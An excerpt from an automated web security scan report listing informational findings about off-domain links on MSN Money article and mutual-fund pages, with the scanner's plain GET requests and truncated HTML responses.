<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296410071&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fmarket-news%2Fpost.aspx%3Fpost%3Dfaf89f05-0560-4409-bafb-7a02dc2c6cb5&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<div class="pst_bod" id="abody"><img src="http://media.social.s-redacted/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110128192402_charlie-blaine-164-b.jpg" alt="Charley Blaine" class="imagefloatleft userImage lead" /><b>
...[SNIP]...
lBinary', 'True','1');" href="http://money.msn.com/market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
y', 'True','0');" href="http://money.msn.com/market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XJtNqJBT2IezhkgeuRuClb2a_4QPIhAFx?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XU7pDky3lWmpb7MTWgZ87L8mEzadYZfdK?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xnro6l_39mWfG4y1hE7LEgx_WqLpHdupL?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<p>The times, they are changing, but much stays the same <img src="http://us.social.s-redacted/s/images/emoticons/regular_smile.gif" alt="Smile" class="emoticon" /></p>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XU7pDky3lWmpb7MTWgZ87L8mEzadYZfdK?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XJtNqJBT2IezhkgeuRuClb2a_4QPIhAFx?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGtFMSV9nRsLXf6vWuvijvpCsvi130Wc-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<p><img src="http://us.social.s-redacted/s/images/emoticons/thumbs_up.gif" alt="Thumbs up" class="emoticon" /></p>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGtFMSV9nRsLXf6vWuvijvpCsvi130Wc-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<p><img src="http://us.social.s-redacted/s/images/emoticons/72_72.gif" alt="Thinking" class="emoticon" />&#160;interesting post hope gone.&#160; we think this end of federal employment benefits combined with muni defaults will have a more severe impact than predicted by most. that said, we can still be be
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGtFMSV9nRsLXf6vWuvijvpCsvi130Wc-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<p><img src="http://us.social.s-redacted/s/images/emoticons/shades_smile.gif" alt="Hot" class="emoticon" />&#160;wow, i am quite stunned by the superlative quality of the posts by hava (the leadoff), buzzy (bubbles are made to be burst by bears), bull rider (i didn't learn that lesson about too much educati
...[SNIP]...
i Klein - The Rise of Disaster Capitalism.&#160; this is all set up purposefully&#160;to continue the massive global transfer of wealth among the elites.&#160; wake up and breathe deeply folks ....... <img src="http://us.social.s-redacted/s/images/emoticons/coffee.gif" alt="Coffee cup" class="emoticon" />&#160;&#160;</p>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGtFMSV9nRsLXf6vWuvijvpCsvi130Wc-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<p><img src="http://us.social.s-redacted/s/images/emoticons/72_72.gif" alt="Thinking" class="emoticon" />&#160;now how can someone who is so right about the best personal armament (SA XD) not understand that we have in place a social democracy and that hitler and stalin were very far from either "socialis
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XnsEzD802_f4COcAl2sMs2OXQ38e5NBT6?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xxb4-1Dy08C7YfTxwSLPMuVw7rrLTmQ4Y?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xxb4-1Dy08C7YfTxwSLPMuVw7rrLTmQ4Y?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XIuRaXU6OdMGt1DPaz47_ilsrPj8q2cj4?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X19kLPwdz5sB2Fnf9yuXWOdr9kOtEAGL6?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xnro6l_39mWfG4y1hE7LEgx_WqLpHdupL?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XhfDJa04FoRujoDJi4C1LEoyMkBUSqiKS?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xj0dHfUYtwaLtz5YCWnr-VnjhGC9rBkYC?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&amp;sc_extcmp=JS_2482_home1&amp;ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&amp;form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&amp;form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&amp;form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&amp;form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&amp;form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=history+of+the+gold+standard&amp;form=MONEY3" class="opennew">The history of the gold standard</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.203. http://money.redacted/market-news/post.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /market-news/post.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=2355a213b1b04e8993d97dc35a8e9833; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 16:50:49 GMT
Content-Length: 116106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406250&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fmarket-news%2Fpost.aspx%3Fpost%3Dfaf89f05-0560-4409-bafb-7a02dc2c6cb5&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<div class="pst_bod" id="abody"><img src="http://media.social.s-redacted/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110128192402_charlie-blaine-164-b.jpg" alt="Charley Blaine" class="imagefloatleft userImage lead" /><b>
...[SNIP]...
lBinary', 'True','1');" href="http://money.msn.com/market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
y', 'True','0');" href="http://money.msn.com/market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XU7pDky3lWmpb7MTWgZ87L8mEzadYZfdK?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XJtNqJBT2IezhkgeuRuClb2a_4QPIhAFx?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGtFMSV9nRsLXf6vWuvijvpCsvi130Wc-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<p><img src="http://us.social.s-redacted/s/images/emoticons/thumbs_up.gif" alt="Thumbs up" class="emoticon" /></p>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGtFMSV9nRsLXf6vWuvijvpCsvi130Wc-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<p><img src="http://us.social.s-redacted/s/images/emoticons/72_72.gif" alt="Thinking" class="emoticon" />&#160;interesting post hope gone.&#160; we think this end of federal employment benefits combined with muni defaults will have a more severe impact than predicted by most. that said, we can still be be
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGtFMSV9nRsLXf6vWuvijvpCsvi130Wc-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<p><img src="http://us.social.s-redacted/s/images/emoticons/shades_smile.gif" alt="Hot" class="emoticon" />&#160;wow, i am quite stunned by the superlative quality of the posts by hava (the leadoff), buzzy (bubbles are made to be burst by bears), bull rider (i didn't learn that lesson about too much educati
...[SNIP]...
i Klein - The Rise of Disaster Capitalism.&#160; this is all set up purposefully&#160;to continue the massive global transfer of wealth among the elites.&#160; wake up and breathe deeply folks ....... <img src="http://us.social.s-redacted/s/images/emoticons/coffee.gif" alt="Coffee cup" class="emoticon" />&#160;&#160;</p>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGtFMSV9nRsLXf6vWuvijvpCsvi130Wc-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<p><img src="http://us.social.s-redacted/s/images/emoticons/72_72.gif" alt="Thinking" class="emoticon" />&#160;now how can someone who is so right about the best personal armament (SA XD) not understand that we have in place a social democracy and that hitler and stalin were very far from either "socialis
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XnsEzD802_f4COcAl2sMs2OXQ38e5NBT6?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xxb4-1Dy08C7YfTxwSLPMuVw7rrLTmQ4Y?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xxb4-1Dy08C7YfTxwSLPMuVw7rrLTmQ4Y?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XIuRaXU6OdMGt1DPaz47_ilsrPj8q2cj4?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X19kLPwdz5sB2Fnf9yuXWOdr9kOtEAGL6?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xnro6l_39mWfG4y1hE7LEgx_WqLpHdupL?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XhfDJa04FoRujoDJi4C1LEoyMkBUSqiKS?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xj0dHfUYtwaLtz5YCWnr-VnjhGC9rBkYC?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-72bd862dcafebd15.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Someone
..(jewcanu)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-72bd862dcafebd15.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
;has a nice job. He never really commits to an answer and is much like a weatherman. Guess at the forecast as if they are wrong no one really cares. I guess that&amp;#39;s why they call it forecasting.<img src="http://us.social.s-redacted/s/images/emoticons/72_72.gif" alt="Thinking" class="emoticon" /></div>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XJtNqJBT2IezhkgeuRuClb2a_4QPIhAFx?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&amp;sc_extcmp=JS_2482_home1&amp;ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&amp;form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&amp;form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&amp;form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&amp;form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&amp;form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=history+of+the+gold+standard&amp;form=MONEY3" class="opennew">The history of the gold standard</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.204. http://money.redacted/mutual-fund/default-dyn.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /mutual-fund/default-dyn.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /mutual-fund/default-dyn.aspx?cp-documentid=6783739 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=368dfbb5f8aa44c7b714267f78d6c7a0; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 16:50:53 GMT
Content-Length: 61323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406253&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fmutual-fund%2Fdefault-dyn.aspx%3Fcp-documentid%3D6783739&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=RRPLwyWA&amp;resize=false" class="opennew">Please tell us what you think</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=RRPLwyWA&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.205. http://money.redacted/mutual-fund/default-dyn.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /mutual-fund/default-dyn.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /mutual-fund/default-dyn.aspx?cp-documentid=6783739 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
